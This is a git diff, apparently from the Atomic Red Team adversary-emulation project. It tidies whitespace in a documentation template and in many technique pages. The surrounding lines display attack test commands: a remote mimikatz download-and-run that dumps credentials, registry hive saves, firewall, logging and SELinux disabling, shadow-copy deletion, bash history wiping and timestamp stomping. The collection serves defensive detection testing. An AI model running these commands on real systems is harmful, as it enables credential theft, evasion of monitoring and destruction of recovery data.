diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb
index 8a0b15d0..0f22faea 100644
--- a/atomic_red_team/atomic_doc_template.md.erb
+++ b/atomic_red_team/atomic_doc_template.md.erb
@@ -33,7 +33,7 @@
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
-<%= test['executor']['command'] %>
+<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
diff --git a/atomics/t1002/t1002.md b/atomics/t1002/t1002.md
index a5b70dfe..3b058a54 100644
--- a/atomics/t1002/t1002.md
+++ b/atomics/t1002/t1002.md
@@ -36,7 +36,6 @@ TODO
#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-
```
@@ -50,6 +49,5 @@ TODO
#### Run it with `powershell`!
```
rar a -r #{output_file} #{input_file}
-
```
diff --git a/atomics/t1003/t1003.md b/atomics/t1003/t1003.md
index 7fbf5cc4..8fd2b6dd 100644
--- a/atomics/t1003/t1003.md
+++ b/atomics/t1003/t1003.md
@@ -164,7 +164,6 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Run it with `powershell`!
```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
-
```
@@ -178,7 +177,6 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
#### Run it with `command_prompt`!
```
gsecdump -a
-
```
@@ -192,7 +190,6 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
#### Run it with `command_prompt`!
```
wce -o #{output_file}
-
```
@@ -209,6 +206,5 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
-
```
diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md
index 1ac44994..70d568e0 100644
--- a/atomics/t1046/t1046.md
+++ b/atomics/t1046/t1046.md
@@ -31,6 +31,5 @@ for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
-
```
diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md
index f78e0fc0..dee692d6 100644
--- a/atomics/t1087/t1087.md
+++ b/atomics/t1087/t1087.md
@@ -57,7 +57,6 @@ xxx
#### Run it with `sh`!
```
cat /etc/passwd > #{output_file}
-
```
@@ -76,7 +75,6 @@ xxx (requires root)
#### Run it with `sh`!
```
cat /etc/sudoers > #{output_file}
-
```
@@ -95,7 +93,6 @@ xxx
#### Run it with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
-
```
@@ -109,7 +106,6 @@ xxx
#### Run it with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
-
```
@@ -123,6 +119,5 @@ xxx
#### Run it with `sh`!
```
lastlog > #{output_file}
-
```
diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md
index 548fccb1..4fc776a7 100644
--- a/atomics/t1089/t1089.md
+++ b/atomics/t1089/t1089.md
@@ -41,7 +41,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop firewalld
systemctl disable firewalld
fi
-
```
@@ -62,7 +61,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop rsyslog
systemctl disable rsyslog
fi
-
```
@@ -83,7 +81,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
-
```
@@ -97,6 +94,5 @@ Disables SELinux enforcement
#### Run it with `sh`!
```
setenforce 0
-
```
diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md
index 46d0ed5c..d23c60ab 100644
--- a/atomics/t1099/t1099.md
+++ b/atomics/t1099/t1099.md
@@ -37,7 +37,6 @@ Stomps on the access timestamp of a file
#### Run it with `sh`!
```
touch -a -t 197001010000.00 #{target_filename}
-
```
@@ -56,7 +55,6 @@ Stomps on the modification timestamp of a file
#### Run it with `sh`!
```
touch -m -t 197001010000.00 #{target_filename}
-
```
@@ -82,6 +80,5 @@ date -s "1970-01-01 00:00:00"
touch #{target_filename}
date -s "$NOW"
stat #{target_filename}
-
```
diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md
index d25fd10b..3e2fb99b 100644
--- a/atomics/t1105/t1105.md
+++ b/atomics/t1105/t1105.md
@@ -64,6 +64,5 @@ sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
-
```
diff --git a/atomics/t1107/t1107.md b/atomics/t1107/t1107.md
index 07841464..36e51aa4 100644
--- a/atomics/t1107/t1107.md
+++ b/atomics/t1107/t1107.md
@@ -59,7 +59,6 @@ mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
echo "This file will be shredded" > /tmp/victim-shred.txt
-
```
@@ -73,7 +72,6 @@ Delete a single file from the temporary directory
#### Run it with `sh`!
```
rm -f /tmp/victim-files/a
-
```
@@ -87,7 +85,6 @@ Recursively delete the temporary directory and all files contained within it
#### Run it with `sh`!
```
rm -rf /tmp/victim-files
-
```
@@ -101,7 +98,6 @@ Use the `shred` command to overwrite the temporary file and then delete it
#### Run it with `sh`!
```
shred -u /tmp/victim-shred.txt
-
```
@@ -132,7 +128,6 @@ type nul > d
type nul > e
type nul > f
type nul > g
-
```
@@ -146,7 +141,6 @@ Delete a single file from the temporary directory using cmd.exe
#### Run it with `command_prompt`!
```
del /f %TEMP%\victim-files-cmd\a
-
```
@@ -160,7 +154,6 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `command_prompt`!
```
del /f /S %TEMP%\victim-files-cmd
-
```
@@ -174,7 +167,6 @@ Delete a single file from the temporary directory using Powershell
#### Run it with `powershell`!
```
Remove-Item -path %TEMP%\victim-files-ps\a
-
```
@@ -188,7 +180,6 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `powershell`!
```
Remove-Item -path %TEMP%\victim-files-ps -recurse
-
```
@@ -202,7 +193,6 @@ Delete all volume shadow copies with vssadmin.exe
#### Run it with `command_prompt`!
```
vssadmin.exe Delete Shadows /All /Quiet
-
```
@@ -216,7 +206,6 @@ Delete all volume shadow copies with wmic
#### Run it with `command_prompt`!
```
wmic shadowcopy delete
-
```
@@ -231,7 +220,6 @@ xxx
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
-
```
diff --git a/atomics/t1113/t1113.md b/atomics/t1113/t1113.md
index 22c05a5e..ace23e44 100644
--- a/atomics/t1113/t1113.md
+++ b/atomics/t1113/t1113.md
@@ -83,7 +83,6 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
```
xwd -root -out #{output_file}
xwud -in #{output_file}
-
```
diff --git a/atomics/t1115/t1115.md b/atomics/t1115/t1115.md
index 5ec42317..d77cef2d 100644
--- a/atomics/t1115/t1115.md
+++ b/atomics/t1115/t1115.md
@@ -35,7 +35,6 @@ Add data to clipboard to copy off or execute commands from.
```
dir | clip
clip < readme.txt
-
```
diff --git a/atomics/t1117/t1117.md b/atomics/t1117/t1117.md
index 5eca9f83..9413c3c8 100644
--- a/atomics/t1117/t1117.md
+++ b/atomics/t1117/t1117.md
@@ -47,7 +47,6 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Run it with `command_prompt`!
```
regsvr32.exe /s /u /i:#{filename} scrobj.dll
-
```
@@ -66,7 +65,6 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Run it with `command_prompt`!
```
regsvr32.exe /s /u /i:#{url} scrobj.dll
-
```
@@ -85,6 +83,5 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Run it with `command_prompt`!
```
regsvr32.exe #{dll_name}
-
```
diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md
index 90b08bac..2de8ec35 100644
--- a/atomics/t1123/t1123.md
+++ b/atomics/t1123/t1123.md
@@ -38,7 +38,6 @@ Create a file called test.wma, with the duration of 30 seconds
#### Run it with `command_prompt`!
```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
-
```
diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md
index 13d3f89f..2f7798e1 100644
--- a/atomics/t1130/t1130.md
+++ b/atomics/t1130/t1130.md
@@ -57,6 +57,5 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
fi
-
```
diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md
index bb8941fd..57959349 100644
--- a/atomics/t1136/t1136.md
+++ b/atomics/t1136/t1136.md
@@ -36,7 +36,6 @@ Create a user via useradd
#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
-
```
@@ -55,6 +54,5 @@ dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
-
```
diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md
index a489642f..4bc58acc 100644
--- a/atomics/t1139/t1139.md
+++ b/atomics/t1139/t1139.md
@@ -33,6 +33,5 @@ xxxx
#### Run it with `sh`!
```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
-
```
diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md
index 75dd9602..0cd9cb4a 100644
--- a/atomics/t1146/t1146.md
+++ b/atomics/t1146/t1146.md
@@ -38,7 +38,6 @@ Clears bash history via rm
#### Run it with `sh`!
```
rm ~/.bash_history
-
```
@@ -52,7 +51,6 @@ Clears bash history via rm
#### Run it with `sh`!
```
echo "" > ~/.bash_history
-
```
@@ -66,7 +64,6 @@ Clears bash history via cat /dev/null
#### Run it with `sh`!
```
cat /dev/null > ~/.bash_history
-
```
@@ -80,7 +77,6 @@ Clears bash history via a symlink to /dev/null
#### Run it with `sh`!
```
ln -sf /dev/null ~/.bash_history
-
```
@@ -94,7 +90,6 @@ Clears bash history via truncate
#### Run it with `sh`!
```
truncate -s0 ~/.bash_history
-
```
@@ -110,6 +105,5 @@ Clears the history of a bunch of different shell types by setting the history si
unset HISTFILE
export HISTFILESIZE=0
history -c
-
```
diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md
index 3a86b118..ff901f7a 100644
--- a/atomics/t1148/t1148.md
+++ b/atomics/t1148/t1148.md
@@ -34,6 +34,5 @@ Disables history collection in shells
```
export HISTCONTROL=ignoreboth
ls #{evil_command}
-
```